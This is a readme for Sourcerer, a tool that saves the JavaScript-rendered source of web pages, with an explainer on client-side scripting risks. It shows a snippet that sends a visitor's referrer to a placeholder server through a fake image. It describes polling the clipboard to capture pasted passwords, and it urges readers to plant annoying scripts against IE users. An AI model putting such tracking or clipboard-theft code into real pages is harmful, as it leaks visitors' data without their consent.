This file is a part of the Sourcerer package. To find the original essays and packages
@ searchlores, use namazu.
Overview
The Sourcerer allows you to save the source of those annoying web sites that
use JavaScript to generate content. Ordinary browsers can save only the source
of the source. For example, let's suppose you have a page which says:
<SCRIPT language=javascript><!--
document.write("Hello world");//-->
</SCRIPT>
In your browser you will see only the text "Hello world", but if you save the page's
source, you will see only this piece of script. Because of this, some really bad people
(you may think it's just funny, but, well, it's not) decided they can
make money on the backs of others by selling them stupid
"HTML protection" software, which is more or less a JavaScript that decodes the
actual source on the fly.
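To make the trick concrete, here is a minimal sketch of how such a "protection" script might work, assuming the simplest possible scheme (plain percent-encoding). The payload string and the function name decodeProtected are made up for illustration; real products use their own, usually messier, encodings.

```javascript
// A hypothetical "protected" page ships its markup as an encoded string.
// Plain percent-encoding is an assumption of this sketch.
const payload = "%3Cb%3EHello%20world%3C%2Fb%3E";

// The "protection" is just a decoder that runs in the visitor's browser.
function decodeProtected(encoded) {
  return decodeURIComponent(encoded);
}

const html = decodeProtected(payload);

// In a browser the page would now write the decoded markup into itself, so
// the visitor sees the real content while "View source" shows only the payload.
if (typeof document !== "undefined") {
  document.write(html);
} else {
  console.log(html); // outside a browser, just print the decoded markup
}
```

Whatever the encoding, the decoder has to be delivered together with the page, which is why rendering the page and dumping the result defeats it.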
Here's what we do. Go to
http://www.blmodirect.com/letters/b5012protected.htm (or try the local copy provided in the package
if that one is down). Right-click on the browser window
and choose "View source". Mm, yeah ... tons of crap. Now open the same URL in Sourcerer (copy & paste
the URL; that's the only way, and it's the fastest anyway, so get used to it). Choose Save source and
open the result in your text editor. That's about how you use Sourcerer. If you're playing at
+Mala's, don't forget to try it on the third riddle :)
If you have a large collection of files to convert (you downloaded them with wGet of course,
certainly NOT by hand), you can automate their conversion from the command line:
Sourcerer.exe "file://localhost/c:/dir with spaces/index.html" c:\no_spaces_therefore_no_quotes\1.html
Sourcerer.exe http://www.searchlores.org index.htm
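For a whole directory, the command lines can be generated instead of typed. The sketch below only builds the text of the commands, following the two examples above; the helper names, the second input path and the numbered output names are assumptions made for illustration, not part of Sourcerer.

```javascript
// Turn a Windows path into the file:// form used in the first example above.
function toFileUrl(windowsPath) {
  return "file://localhost/" + windowsPath.replace(/\\/g, "/");
}

// Quote an argument only when it contains spaces.
function quoteIfNeeded(arg) {
  return arg.includes(" ") ? '"' + arg + '"' : arg;
}

// Build one Sourcerer command line per input file.
// Output files are simply numbered 1.html, 2.html, ... inside outDir.
function buildCommands(inputPaths, outDir) {
  return inputPaths.map((input, i) => {
    const output = outDir + "\\" + (i + 1) + ".html";
    return ["Sourcerer.exe", quoteIfNeeded(toFileUrl(input)), quoteIfNeeded(output)].join(" ");
  });
}

const commands = buildCommands(
  ["c:\\dir with spaces\\index.html", "c:\\mirror\\page2.html"],
  "c:\\no_spaces_therefore_no_quotes"
);
console.log(commands.join("\n"));
```

The printed lines can be pasted into a batch file and run in one go.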
IMPORTANT! Please, use your brain. Sourcerer uses an IE WebBrowser control, which means
that it is effectively an IE copy. Don't use it for browsing, or you'll get hacked, spammed, flooded
or made to look stupid in some other way. Proof? (Btw, do copy these snippets into your HTML pages to annoy
the bozos that use IE, or better, find fresh ones, or learn to write such scripts on your own.)
Note that these snippets will work without any user interaction whatsoever; the examples here require a button push so you can read the article, duh :)
Also, I haven't tested them under many OS/browser combinations, so on your system they may behave differently.
There are more thorough papers on the subject for the interested reader, so this section is
targeted at non-coding seekers and will therefore be kept as low-tech as possible.
The most important thing to know is that HTML scripting is something that happens on
YOUR side of the user-internet duet (as opposed to CGI or server-side scripting, which
happens on a server). It is also called client-side scripting. The scripts are programs,
which are interpreted (i.e. translated into machine-understandable code) and run by your
browser.
These little programs can do a lot of things (which some people may consider useful),
but are mainly designed to change or add to the content of the HTML document,
for example by printing the current time and date. This means that the page source,
which your browser downloads from the remote server, will be one and the same, but still
you will see different text each time. Browse to
www.searchlores.org with and without JavaScript
and see the difference.
1)<SCRIPT LANGUAGE="JavaScript">
2) document.write("<I>Updated </I>");
3) document.write("<font color=black>");
4) document.write(UpdateDate(5,7,2003));
5) document.write("</font></i>");
6)</script>
Let's follow what it does:
Tags 1) and 6) mark a piece of HTML which is a script. If the browser does not support or
accept scripting, the contents will be ignored. The "language" attribute
tells us (and more importantly, tells the browser) that this is JavaScript. Lines 2), 3) and 5)
print some text to the HTML document, which is the same as if the text were directly
included in the HTML, while 4) does something more interesting: it calls a function
(a subroutine; a small piece of code, defined elsewhere to do a routine job), which prints
the number of days since the date specified by the three numbers (month, day, year).
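The real UpdateDate function is defined elsewhere on the site and is not reproduced here. As a rough idea of what such a function could look like, here is a hypothetical stand-in called daysSince, which takes the same (month, day, year) arguments; the extra "now" parameter is an addition so the result can be checked against a fixed date.

```javascript
// Hypothetical stand-in for the site's UpdateDate(month, day, year).
// The optional "now" parameter is not in the original; it makes testing easy.
function daysSince(month, day, year, now = new Date()) {
  const MS_PER_DAY = 24 * 60 * 60 * 1000;
  // Compare calendar dates in UTC so daylight saving changes do not skew the count.
  const then = Date.UTC(year, month - 1, day); // JavaScript months are 0-based
  const today = Date.UTC(now.getFullYear(), now.getMonth(), now.getDate());
  return Math.round((today - then) / MS_PER_DAY);
}

// In a page this could be used as: document.write(daysSince(5, 7, 2003));
console.log(daysSince(5, 7, 2003, new Date(2003, 4, 17))); // prints 10
```

Since the result depends on the visitor's clock, the same downloaded source produces a different page every day.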
Note that since the user agents ('browsers') of the current search engines do not interpret
scripts, any text written by such means will be visible only to the human reader. For example,
compare
site:searchlores.org searching with
site:searchlores.org updated
Each scripting language (JavaScript, VBScript, JScript) has its own syntactical rules, which
are not the subject of this article, and you should normally not worry about them. We can also
consider Java and Flash ActionScript as such scripting languages (although they are
precompiled instead of being interpreted on the fly, but this difference is of no importance
here), because they too are executed on the client side. All these languages were designed
to be 'secure' in the sense that they cannot (rather SHOULD not) read or write files on the
user's machine, execute local commands, etc. The sad thing is that exploits abusing bugs
in the scripting system are continuously found, allowing anything from slight annoyances
(like opening all your CD trays at once) to serious security breaches (full read/write/execute
access to the victim's machine). That's why common sense dictates that we browse with scripting
turned off (no matter what browser we use).
Besides exploits, which are abnormal behaviour of the scripting system, its normal behaviour
has some uncanny features too. Being integrated with your browser, JavaScript for example knows
WHAT kind of browser it is, what your OS is, your screen resolution, color depth, browser history
and even the contents of your clipboard! You may think that this is okay, since it's executed
only on your machine, but it's not, since a page author can do something like this:
<script language=javascript>
document.write("<img src='http://myserver.com/my_fake_image_script.gif?" + document.referrer + "'>");
</script>
This means that we include in the page's source an image tag, and the image source we provide
is in fact a masqueraded SERVER-SIDE script, which receives the referring URL when your
browser blindly goes to download that image. Or the screen
width. Or the clipboard. Or you can make the page periodically check (while it is active) if
there's something new in the clipboard and send it to your server.
Do you copy and paste your passwords?
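To see what actually travels over the wire, here is a small sketch that builds such an "image" address from a couple of values. The base URL is the placeholder from the snippet above; the function name buildBeaconUrl and the field names "ref" and "w" are invented for this example. In a browser the values would come from document.referrer and screen.width; here they are fixed so the result is predictable.

```javascript
// Build the URL of a fake "image" that carries data back to a server.
// The field names ("ref", "w") are made up for this sketch.
function buildBeaconUrl(baseUrl, info) {
  const query = Object.keys(info)
    .map((key) => encodeURIComponent(key) + "=" + encodeURIComponent(info[key]))
    .join("&");
  return baseUrl + "?" + query;
}

const url = buildBeaconUrl("http://myserver.com/my_fake_image_script.gif", {
  ref: "http://www.searchlores.org/", // stands in for document.referrer
  w: 1024,                            // stands in for screen.width
});
console.log(url);
```

Everything after the question mark ends up in the server's logs the moment the browser requests the "image", which is a good reason to look at image URLs when you inspect a rendered page.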
Btw Opera users are not much more immune to these tricks, as even with image loading turned
off, some images can be loaded through CSS or JavaScript. The paranoid to the
bone should use wGet with the --page-requisites option, with faked referrer and user-agent
fields, through a secure proxy to download the page they want to view. Then disconnect from
the internet, manually check each file for suspicious code (did you know that in the past
Netscape Navigator would execute JavaScript
hidden in GIF comments?), render the page through Sourcerer, manually cut the remaining
scripts, and then hope that their browser will not be crashed by the latest strange
exploit.
It's not an easy life, being paranoid :) Yeah, well, just turn off JavaScript, okay?
Finale
The sources are included in the package; do whatever you want with them, I don't care.
To save the curious their precious time, the essence of this program is this snippet:
Dim doc As HTMLDocument
Set doc = Browser.Document
...
s = doc.documentElement.outerHTML
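The same property is also available to scripts running inside a page, so the idea can be shown in JavaScript as well. This is only an illustration of the property, not how Sourcerer itself is built; the function name renderedSource and the stand-in object are made up for the example.

```javascript
// Return the markup of the document as it exists after scripts have run.
function renderedSource(doc) {
  return doc.documentElement.outerHTML;
}

// In a browser you would call renderedSource(document).
// Outside a browser, a tiny stand-in object shows the shape of the call.
const fakeDocument = {
  documentElement: { outerHTML: "<html><body>Hello world</body></html>" },
};
console.log(renderedSource(fakeDocument));
```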